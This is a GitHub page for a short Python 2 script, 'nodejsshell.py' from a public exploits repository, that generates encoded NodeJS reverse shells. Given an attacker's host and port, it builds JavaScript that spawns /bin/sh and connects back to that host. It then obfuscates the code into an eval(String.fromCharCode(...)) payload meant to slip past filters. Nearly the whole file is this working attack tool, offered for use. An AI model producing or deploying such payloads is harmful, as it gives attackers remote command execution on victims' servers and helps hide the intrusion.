exploits/nodejsshell.py at master · infodox/exploits · GitHub

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
#!/usr/bin/python
# Generator for encoded NodeJS reverse shells
# Based on the NodeJS reverse shell by Evilpacket
# https://github.com/evilpacket/node-shells/blob/master/node_revshell.js
# Onelineified and suchlike by infodox (and felicity, who sat on the keyboard)
# Insecurety Research (2013) - insecurety.net
import sys

if len(sys.argv) != 3:
    print "Usage: %s <LHOST> <LPORT>" %(sys.argv[0])
    sys.exit(0)

ip = sys.argv[1]
port = sys.argv[2]

def charencode(string):
    encoded=''
    for char in string:
        encoded=encoded+","+str(ord(char))
    return encoded[1:]

print "[+] LHOST = %s" %(ip)
print "[+] LPORT = %s" %(port)
plaintext = """var net = require('net'),util = require('util'),spawn = require('child_process').spawn,sh = spawn('/bin/sh',[]);HOST="XXLHOSTXX";PORT="XXLPORTXX";TIMEOUT="5000";function c(HOST,PORT) {    var client = new net.Socket();    client.connect(PORT, HOST, function() {        client.write("Connected");        client.pipe(sh.stdin);        util.pump(sh.stdout,client);    });    client.on('error', function(e) {        setTimeout(c(HOST,PORT), TIMEOUT);    });} c(HOST,PORT);"""
plaintext = plaintext.replace('XXLHOSTXX', ip)
plaintext = plaintext.replace('XXLPORTXX', port)
print "[+] Encoding"
payload = charencode(plaintext)
final = "eval(String.fromCharCode(%s))" %(payload)
print final